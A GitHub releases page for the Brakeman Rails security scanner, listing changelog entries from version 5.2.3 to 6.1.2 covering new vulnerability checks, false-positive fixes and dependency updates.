Skip to content

Releases: presidentbeef/brakeman

6.1.2

02 Feb 06:39
@presidentbeef presidentbeef
v6.1.2
a368fd9
Compare
Choose a tag to compare
6.1.2 Latest
Latest
  • Avoid detecting Phlex components as dynamic render paths (Máximo Mussini)
  • Avoid detecting ViewComponentContrib::Base as dynamic render paths (vividmuimui)
  • Avoid copying Sexps that are too large (#1818, #1546)
  • Add EOL date for Ruby 3.3.0
  • Remove deprecated use of Kernel#open("|...")
  • Remove safe_yaml gem dependency
  • Update Highline to 3.0 (#1812)
Assets 2
0 Join discussion

6.1.1

24 Dec 07:52
@presidentbeef presidentbeef
v6.1.1
03bc349
Compare
Choose a tag to compare
6.1.1
  • Handle racc as a default gem in Ruby 3.3.0
Assets 2
0 Join discussion

6.1.0

05 Dec 07:06
@presidentbeef presidentbeef
v6.1.0
391c95e
Compare
Choose a tag to compare
6.1.0
  • Add check for unfiltered search with Ransack
  • Add --timing to add timing duration for scan steps
  • Add PG::Connection.escape_string as a SQL sanitization method (Joévin Soulenq)
  • Handle class << self
  • Fix class method lookup in parent classes
  • Fix keyword splats in filter arguments
Assets 2
0 Join discussion

6.0.0.1 - Docker only

25 May 16:11
@presidentbeef presidentbeef
v6.0.0.1
6af53c6
This commit was created on GitHub.com and signed with GitHub’s verified signature. The key has expired.
GPG key ID: 4AEE18F83AFDEB23
Expired
Learn about vigilant mode.
Compare
Choose a tag to compare
6.0.0.1 - Docker only

This release is to fix the Ruby version used in the Docker image.

No other changes.

Assets 2

6.0.0

25 May 16:09
@presidentbeef presidentbeef
v6.0.0
9be7fbf
Compare
Choose a tag to compare
6.0.0
  • Drop support for Ruby 1.8/1.9 syntax
  • Raise minimum Ruby version to 3.0
  • Add obsolete fingerprints to comparison report (#1758)
  • Warn about missing CSRF protection when defaults are not loaded (Chris Kruger)
  • Fix false positive with content_tag in newer Rails (#1778)
  • Scan directories that include the word public
  • Fix end-of-life dates for Ruby
Assets 2

5.4.1

21 Feb 17:33
@presidentbeef presidentbeef
v5.4.1
0bc31d9
Compare
Choose a tag to compare
5.4.1
  • Add Rails 6.1 and 7.0 default configuration values
  • Support Rails 7 redirect options
  • Add redirect_back and redirect_back_or_to to open redirect check
  • Revise checking for request.env to only consider request headers
  • Prevent redirects using url_from being marked as unsafe (Lachlan Sylvester)
  • Warn about unscoped find for find_by(id: ...)
  • Support presence, presence_in and in? (#1569)
  • Fix issue with if expressions in when clauses (#1743)
  • Fix file/line location for EOL software warnings
Assets 2
0 Join discussion

5.4.0

18 Nov 06:34
@presidentbeef presidentbeef
v5.4.0
41ab79e
Compare
Choose a tag to compare
5.4.0
  • Add check for weak RSA key sizes and padding modes (#1736)
  • Add check for absolute paths issue with Pathname (#1721)
  • Handle multiple values and splats in case/when (#1730)
  • Ignore more model methods in redirects (#1723)
  • Fix load_rails_defaults overwriting settings in the Rails application (James Gregory-Monk)
  • Use relative paths for CodeClimate report format (Mike Poage)
Assets 2
0 Join discussion

5.3.1

14 Nov 22:08
@presidentbeef presidentbeef
v5.3.1
1212850
Compare
Choose a tag to compare
5.3.1
Assets 2

5.3.0

10 Aug 00:53
@presidentbeef presidentbeef
v5.3.0
69f16f1
Compare
Choose a tag to compare
5.3.0
  • Add CWE information to warnings (Stephen Aghaulor)
  • Include explicit engine or lib paths in vendor/ (Joe Rafaniello)
  • Add check for CVE-2022-32209
  • Load rexml as a Brakeman dependency
  • Fix "full call" information propagating unnecessarily
Assets 2

5.2.3

20 Jun 04:08
@presidentbeef presidentbeef
v5.2.3
c623746
Compare
Choose a tag to compare
5.2.3
  • Fix error with hash shorthand syntax (#1700)
  • Match order of interactive options with help message (@roryokane)

Contributors

roryokane
Assets 2
0 Join discussion